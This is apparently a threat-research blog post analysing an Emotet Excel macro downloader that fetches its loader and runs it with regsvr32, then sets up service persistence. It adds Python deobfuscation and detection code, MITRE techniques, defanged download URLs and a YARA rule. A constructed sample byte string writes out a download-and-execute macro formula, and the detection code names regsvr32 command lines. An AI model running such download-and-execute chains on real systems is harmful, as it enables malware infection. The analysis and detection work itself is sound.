Emotet Downloader document uses Regsvr32 for execution


This article investigates a recent Emotet intrusion and details how the final Emotet payload is installed on the system. The main observations are as follows:

  • Hidden Excel macros used to download and run the Emotet loader.
  • Emotet loader run using regsvr32.exe.
  • Embedded encrypted Emotet payload in the .rsrc section of the loader.
  • Windows service used for Emotet payload persistence.
  • Emotet continues to evolve delivery techniques and obfuscation to reduce detection.


Emotet is a Windows-based malware loader operated by the cyber crime group TA542 (1), also called Mummy Spider (2). First discovered in mid-2014, Emotet was initially designed as a banking Trojan and was later developed into a modular malware platform capable of performing various functions such as loading other malware, information theft and spambot features (1). Emotet is mainly distributed through phishing campaigns (1). In early 2021, North American and European law enforcement disrupted Emotet’s infrastructure, resulting in an outage of Emotet’s activity (3), but Emotet resumed operations in mid-November 2021 (4). Emotet has been observed dropping other malware families such as Qakbot (5) and Cobalt Strike (6). Emotet infections are high risk, having led to ransomware deployments in the past (7).


EclecticIQ analysts observed the distribution of Emotet throughout 2022. The bar chart below highlights the number of Emotet files and network indicators observed in EclecticIQ’s internal dataset during the first half of 2022.


Figure 1.1: Bar chart of the number of Emotet-specific indicators seen each month in the first half of 2022

Step One: Initial Delivery

Microsoft Office XLS document runs a hidden Excel 4.0 macro when activated

The first stage of the attack likely starts with a spam email carrying a Microsoft Office XLS document as an attachment. The XLS document uses hidden Excel macros. When opened, the document asks the user to enable the content; once enabled, the macro runs.


Figure 2.1: Screenshot of an Excel document prompting the user to “Enable content”

The actor uses various methods to obfuscate the Excel macro, which makes it more difficult to statically analyze the file. The document uses several password-protected spreadsheets; these sheets contain ‘CHAR’ formulas, each returning a single character of text. The characters are scattered across the sheets in different cells (as shown in Figure 2.2) and are written in white font so that the sheets appear blank.


Figure 2.2: Characters scattered around Excel cells
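An added example (not code from the EclecticIQ post) of how an analyst can reassemble text hidden in scattered CHAR() cells. The sheet contents are constructed, and the assumption that the characters are joined by a ‘&’ concatenation formula of cell references is mine; the post only states that the characters are scattered across hidden, white-font cells.

```python
"""Reassemble text hidden in scattered Excel 4.0 CHAR() cells.

Constructed sheet: formulas are given as a dict keyed by cell address. The
assembly cell E8 (a '&' chain of cell references) is an assumption about how
such documents concatenate the characters, not something the post states.
"""
import re

CHAR_RE = re.compile(r"^=CHAR\((\d+)\)$", re.IGNORECASE)
REF_RE = re.compile(r"\$?([A-Z]{1,3})\$?(\d+)", re.IGNORECASE)

# Constructed sheet: the characters of 'regsvr32' scattered across cells.
SHEET = {
    "B7": "=CHAR(114)", "K2": "=CHAR(101)", "D9": "=CHAR(103)", "A4": "=CHAR(115)",
    "H1": "=CHAR(118)", "C6": "=CHAR(114)", "F3": "=CHAR(51)",  "J5": "=CHAR(50)",
    "E8": "=B7&K2&D9&A4&H1&C6&F3&J5",   # assumed assembly formula
}


def char_value(formula):
    """Return the character produced by a =CHAR(n) formula, or None."""
    m = CHAR_RE.match(formula.strip())
    return chr(int(m.group(1))) if m else None


def resolve(sheet, formula, depth=0):
    """Evaluate a '&' chain of cell references / quoted literals, following
    references recursively. Quoted literals containing '&' are not handled."""
    if depth > 50:
        raise ValueError("reference chain too deep")
    formula = formula.strip()
    if not formula.startswith("="):
        return formula                      # plain cell value
    c = char_value(formula)
    if c is not None:
        return c
    parts = []
    for piece in formula[1:].split("&"):
        piece = piece.strip()
        m = REF_RE.fullmatch(piece)
        if m:
            ref = (m.group(1) + m.group(2)).upper()
            parts.append(resolve(sheet, sheet.get(ref, ""), depth + 1))
        elif len(piece) >= 2 and piece[0] == piece[-1] == '"':
            parts.append(piece[1:-1])       # quoted literal
        else:
            parts.append(piece)             # unknown token, keep as-is
    return "".join(parts)


def hidden_strings(sheet):
    """Return every cell whose formula concatenates pieces, with its resolved text."""
    return {cell: resolve(sheet, f) for cell, f in sheet.items()
            if f.startswith("=") and "&" in f}


if __name__ == "__main__":
    print(hidden_strings(SHEET))
```

Running the block on the constructed sheet recovers the string assembled in E8; on a real document the dict would be filled from the hidden sheets after the password protection is removed.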

The macro downloads and runs Emotet Loader

When run with macros enabled, the document uses the ‘Auto_Open’ method to execute the formula shown in Figure 2.3. This formula deobfuscates the macro, revealing four CALL and EXEC functions. The macro then tries to download the Emotet loader using the URLDownloadToFileA function and save it to the current parent directory with the file extension ‘.ocx’ (ActiveX control). It then tries to run the downloaded Emotet loader using regsvr32.exe with the /S (silent) parameter. The macro makes up to four attempts to download and run the loader; if an earlier attempt succeeds, the macro terminates.


Figure 2.3: Unobfuscated malicious Excel formulas

Step Two: Emotet Loader

Emotet Loader decrypts and loads Emotet payload

The Emotet Loader is a 64-bit DLL, which contains the encrypted Emotet payload as an embedded resource, under the name “7732”.


Figure 3.1: Encrypted Emotet payload in PE .rsrc section

The Emotet loader loads the encrypted payload into memory, using the VirtualAlloc function to allocate the memory. The loader passes the value 0x1E34 (decimal 7732), the name of the encrypted payload resource, as the second parameter to the LoadResource function.

Figure 3.2: Payload encrypted in hex editor (top) and memory-mapped (bottom)

The Emotet payload is decrypted and written to the allocated memory area. The payload is a 64-bit DLL. The file is moved from %HOMEPATH%\soci2.ocx to qbknpcdiwaui.dll. Persistence is established using a Windows service; the created service runs the Emotet payload using regsvr32.exe.

Figure 3.3: Emotet payload decrypted in memory
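An added example (not EclecticIQ tooling) covering both regsvr32 uses in this chain: the Excel macro running the downloaded .ocx loader with ‘regsvr32.exe /S’, and the Windows service that later runs the payload DLL through regsvr32.exe. The event records are constructed Sysmon-style dictionaries (EventID 1 for process creation, EventID 7045 for a newly installed service); the field names, file paths and service names are assumptions for the example, not values from the intrusion.

```python
"""Detection logic for Office-spawned 'regsvr32 /S' loads and for services
whose ImagePath runs a module through regsvr32.exe.

Constructed telemetry: EventID 1 = process creation, EventID 7045 = service
installed. Paths and service names are made up for this example.
"""
import re
from typing import Optional

# regsvr32 silent switch (/s or -s) as a standalone token
SILENT_FLAG_RE = re.compile(r"(?i)(?:^|\s)[/-]s(?=\s|$)")
# a module argument ending in .ocx or .dll
MODULE_RE = re.compile(r"(?i)\.(?:ocx|dll)\b")
# anything under a user profile directory (assumed suspicious for regsvr32)
USER_PATH_RE = re.compile(r"(?i)[\\/]users[\\/]")
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def check_process_creation(evt: dict) -> Optional[str]:
    """Flag regsvr32 silently loading an .ocx/.dll when spawned by an Office
    application, or when the module lives under a user profile."""
    if _basename(evt.get("Image", "")) != "regsvr32.exe":
        return None
    cmd = evt.get("CommandLine", "")
    if not (SILENT_FLAG_RE.search(cmd) and MODULE_RE.search(cmd)):
        return None
    if _basename(evt.get("ParentImage", "")) in OFFICE_PARENTS:
        return "office-spawned-regsvr32"
    if USER_PATH_RE.search(cmd):
        return "regsvr32-user-path"
    return None


def check_service_install(evt: dict) -> Optional[str]:
    """Flag a newly installed service whose ImagePath runs a module via regsvr32."""
    if evt.get("EventID") != 7045:
        return None
    image_path = evt.get("ImagePath", "")
    if "regsvr32" in image_path.lower() and MODULE_RE.search(image_path):
        return "service-regsvr32-persistence"
    return None


def scan(events):
    """Return (event Id, verdict) for every event that triggers a detection."""
    hits = []
    for evt in events:
        if evt.get("EventID") == 1:
            verdict = check_process_creation(evt)
        else:
            verdict = check_service_install(evt)
        if verdict:
            hits.append((evt["Id"], verdict))
    return hits


# Constructed sample telemetry (paths and service names are made up)
SAMPLE_EVENTS = [
    {"Id": 1, "EventID": 1,
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r"regsvr32.exe /S C:\Users\victim\soci2.ocx"},
    {"Id": 2, "EventID": 1,
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\victim\AppData\Local\Temp\update.dll"},
    {"Id": 3, "EventID": 1,   # installer registering a vendor DLL: not flagged
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"Id": 4, "EventID": 7045, "ServiceName": "placeholder_svc",
     "ImagePath": r'C:\Windows\System32\regsvr32.exe /s "C:\Users\victim\AppData\Roaming\qbknpcdiwaui.dll"'},
    {"Id": 5, "EventID": 7045, "ServiceName": "placeholder_benign",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The Office-parent rule fires on the macro stage regardless of where the .ocx was written; the user-path rule catches the same loader when the parent is not an Office process; the 7045 rule covers the persistence step, where a service image path pointing at regsvr32.exe is rare enough in normal environments to be worth an alert on its own.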


Once the Emotet payload is fully installed, it gives the malware operator remote access to the victim’s system, which allows other Emotet modules or other malware families to be loaded onto the system. The MITRE ATT&CK classification, indicators and YARA rule below can help security teams track, monitor and detect Emotet infections.

  • T1566.001: Phishing: Spearphishing Attachment
  • T1204.002: User Execution: Malicious File
  • T1543.003: Create or Modify System Process: Windows Service
  • T1027: Obfuscated Files or Information
  • T1140: Deobfuscate/Decode Files or Information
  • T1218.010: System Binary Proxy Execution: Regsvr32
  • T1071.001: Application Layer Protocol: Web Protocols

Excel document (SHA-256):

  • 625121dba58742d70d59010af2a452649101cc0d6a3c956352e0c19bf31c7fc3

Download URLs:

  • https://cointrade[.]world/recipes/0LjXVwpQrhw/
  • http://www.garantihaliyikama[.]com/wp-admin/jp64lssPHEe2ii/
  • http://haircutbar[.]com/cgi-bin/BC3WAQ8zJY4ALXA4/
  • http://airhobi[.]com/system/WLvH1ygkOYQO/

YARA rule:

rule emotet_xls_downloader {
    meta:
        identifier = "3B7stbUhJvOTZBIt8VYWJb"
        edition = "1.0"
        first_imported = "2022-07-21"
        last_modified = "2022-07-21"
        status = "RELEASED"
        source = "ECLECTICIQ"
        author = "EclecticIQ Threat Research Team"
        description = "Yara rule to track Emotet Excel downloader documents."
        category = "MALWARE"
        malware = "EMOTET"
        mitre_att = "S0367"
        report = "Emotet Downloader document uses Regsvr32 for execution"
        sha256 = "625121dba58742d70d59010af2a452649101cc0d6a3c956352e0c19bf31c7fc3"

    strings:
        $ocx = ".ocx"
        $h1 = {6F 6E 22 2C 22 55 52 4C 44 6F 77 6E 6C 6F 61 64 54 6F 46 69 6C} // on","URLDownloadToFil
        $h2 = {2C 30 2C 22 68 74 74 70} // ,0,"http
        $h3 = {53 79 73 74 65 6D 33 32 5C 41} // System32\A
        $h4 = {3A 5C 57 69 6E 64 6F 77 73 5C 41} // :\Windows\A

    condition:
        uint16(0) == 0xcfd0 and filesize // the remainder of the condition (filesize bound and string clause) is truncated in the source
}
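An added Python mirror of the rule’s header and string checks (not EclecticIQ tooling), included to make visible what each hex string decodes to and why the magic test compares against 0xcfd0. The sample document bytes are constructed inline from formula fragments of the shape the strings describe; the URL and paths in it are made up and the bytes are not taken from the real file.

```python
"""Mirror of the YARA rule's OLE2 magic test and hex strings.

SAMPLE_XLS is a constructed byte string (OLE2 header plus made-up formula
text), not the real document.
"""
import struct

OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")   # Compound File (legacy .xls) header

# The rule's strings, decoded once so the text each one matches is visible.
PATTERNS = {
    "$ocx": b".ocx",
    "$h1": bytes.fromhex("6F 6E 22 2C 22 55 52 4C 44 6F 77 6E 6C 6F 61 64 54 6F 46 69 6C"),  # on","URLDownloadToFil
    "$h2": bytes.fromhex("2C 30 2C 22 68 74 74 70"),                                          # ,0,"http
    "$h3": bytes.fromhex("53 79 73 74 65 6D 33 32 5C 41"),                                    # System32\A
    "$h4": bytes.fromhex("3A 5C 57 69 6E 64 6F 77 73 5C 41"),                                 # :\Windows\A
}


def is_ole2(data: bytes) -> bool:
    """YARA's uint16(0) == 0xcfd0: the bytes D0 CF read as a little-endian 16-bit int."""
    return len(data) >= 2 and struct.unpack("<H", data[:2])[0] == 0xCFD0


def find_patterns(data: bytes) -> dict:
    """Map each rule string name to its first offset in data, or -1 if absent."""
    return {name: data.find(pat) for name, pat in PATTERNS.items()}


def triage(data: bytes) -> dict:
    """Report the header check and which rule strings are present or missing."""
    offsets = find_patterns(data)
    matched = [n for n, off in offsets.items() if off >= 0]
    return {
        "ole2": is_ole2(data),
        "matched": matched,
        "missing": [n for n in PATTERNS if n not in matched],
        "offsets": offsets,
    }


# Constructed document body: OLE2 header followed by formula text of the shape the
# rule's strings describe. '"urlmon","URLDownloadToFileA"' is what $h1 latches onto.
SAMPLE_XLS = (
    OLE2_MAGIC + b"\x00" * 24
    + b'=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://example.invalid/p/","C:\\Windows\\Abc.ocx",0,0)'
    + b"\x00" * 8
    + b'=EXEC("regsvr32.exe /S C:\\Windows\\System32\\Abc.ocx")'
)

if __name__ == "__main__":
    print(triage(SAMPLE_XLS))
```

The offsets returned by triage() are the same values YARA would report with the -s option, which makes this a convenient way to confirm which part of a formula each string is keyed on before tuning the rule.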

About EclecticIQ Threat Research

EclecticIQ is a global provider of threat intelligence, hunting and response technology and services. Based in Amsterdam, the EclecticIQ Threat Research team is made up of experts from Europe and the United States with decades of experience in cybersecurity and intelligence in industry and government.

We would like to hear from you. Please send us your comments by writing to us at [email protected] or fill in the EclecticIQ Audience Interest Survey to direct our research towards your priority area.


  1. https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service
  2. https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/
  3. https://www.europol.europa.eu/media-press/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action
  4. https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/
  5. https://www.malware-traffic-analysis.net/2020/08/10/index.html
  6. https://isc.sans.edu/diary/Emotet+infection+with+Cobalt+Strike/28824
  7. https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/

*** This is a syndicated blog from the Security Bloggers Network of Blog EclecticIQ authored by the EclecticIQ Threat Research Team. Read the original post at: https://blog.eclecticiq.com/emotet-downloader-document-uses-regsvr32-for-execution
